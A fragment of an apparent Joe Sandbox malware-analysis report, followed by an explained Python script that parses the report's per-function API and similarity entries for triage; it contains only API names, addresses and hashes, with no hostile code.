                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: 74d0bc7dd80d5b2541f821412ed9fe14089ec4ac1f5ebdda5f8ed7cc9aa293c2
                                  • Instruction ID: 51aa58898a8a1968612bebca1fb72d2b34fd6824948f872ea397d0b22a45e7f5
                                  • Opcode Fuzzy Hash: 74d0bc7dd80d5b2541f821412ed9fe14089ec4ac1f5ebdda5f8ed7cc9aa293c2
                                  • Instruction Fuzzy Hash: 61113374A11B039BD7259F35D90C927B7F8FF44301749052DA896CBA40EB34F891CB60
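The per-function entries above are machine-generated and repetitive, which makes them tedious to triage by eye but easy to parse. The following is an added example, not Joe Sandbox code, of a parser for this entry layout: it turns each block into a record of its direct API calls, the calls reported "Part of subcall function", the Similarity fields and the associated memory dumps, and then tallies which imported APIs the functions call. SAMPLE is a constructed excerpt of two entries from this page with the long Associated lists trimmed; the two regular expressions and the rule that an entry ends at its "Instruction Fuzzy Hash" line are assumptions drawn from the layout visible here, not from any published format specification.

```python
"""Parser for Joe Sandbox per-function entries ("APIs" / "Memory Dump Source" /
"Similarity" blocks).  Added example, not Joe Sandbox code; SAMPLE is a
constructed excerpt of two entries on this page with Associated lists trimmed."""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Optional

# Both call spellings seen in the report (assumed layout):
#   "• GetProcessHeap.KERNEL32(00000008,?), ref: 00346F74"
#   "• Part of subcall function 00357D40: std::_Xinvalid_argument.LIBCPMT ref: 00357D58"
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[^.(\s]+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-F]{8})$"
)
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*?)$")
HEADERS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
           "Yara matches", "Similarity"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: tuple[str, ...]
    ref: str                          # address of the call site
    subcall_of: Optional[str] = None  # callee address when reported via a subcall


@dataclass
class FunctionEntry:
    calls: list[ApiCall] = field(default_factory=list)
    meta: dict[str, str] = field(default_factory=dict)
    associated: list[str] = field(default_factory=list)

    @property
    def direct_calls(self) -> list[ApiCall]:
        return [c for c in self.calls if c.subcall_of is None]

    @property
    def first_ref(self) -> Optional[str]:
        """Lowest direct call-site address, a cheap locator for the function."""
        return min((c.ref for c in self.direct_calls), default=None)


def parse_entries(text: str) -> list[FunctionEntry]:
    entries: list[FunctionEntry] = []
    cur: Optional[FunctionEntry] = None
    for raw in text.splitlines():
        s = raw.strip()
        if s == "APIs":                       # each entry opens with its API list
            cur = FunctionEntry()
            continue
        if cur is None or not s or s in HEADERS:
            continue
        if m := API_RE.match(s):
            args = tuple(a for a in (m["args"] or "").split(",") if a)
            cur.calls.append(ApiCall(m["api"], m["module"], args, m["ref"], m["sub"]))
            continue
        if m := KV_RE.match(s):
            key, val = m["key"], m["val"]
            if key == "Associated":           # drop the fused download-link label
                cur.associated.append(val.removesuffix("Download File"))
            else:
                cur.meta[key] = val
            if key == "Instruction Fuzzy Hash":  # assumed: last field of every entry
                entries.append(cur)
                cur = None
    return entries


def api_summary(entries: list[FunctionEntry]) -> Counter:
    """How often each imported API is called directly across the parsed functions."""
    return Counter(f"{c.api}.{c.module}" for e in entries for c in e.direct_calls)


SAMPLE = """\
APIs
• GetProcessHeap.KERNEL32(00000008,?), ref: 00346F74
• RtlAllocateHeap.NTDLL(00000000), ref: 00346F7B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: Heap$AllocateProcess
• String ID: @
• Instruction Fuzzy Hash: E0216DB06007019BEB218F20DC85BB673E8EB52704F454868E98ACF684E775F989CB61
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 00357C94
• std::_Xinvalid_argument.LIBCPMT ref: 00357CAF
  • Part of subcall function 00357D40: std::_Xinvalid_argument.LIBCPMT ref: 00357D58
Similarity
• API ID: Xinvalid_argumentstd::_
• String ID: string too long
• Instruction Fuzzy Hash: 983107723086148BD736DE6CF8C0D6AF3F9EF91762B21462AF8468B661C7719C4583A4
"""
```

Feeding the whole report text to parse_entries and sorting the result by first_ref gives a compact table of which functions touch the heap, the string-copy imports or the C++ runtime, which is a quicker starting point for picking functions to open in the disassembler than scrolling the entries one by one.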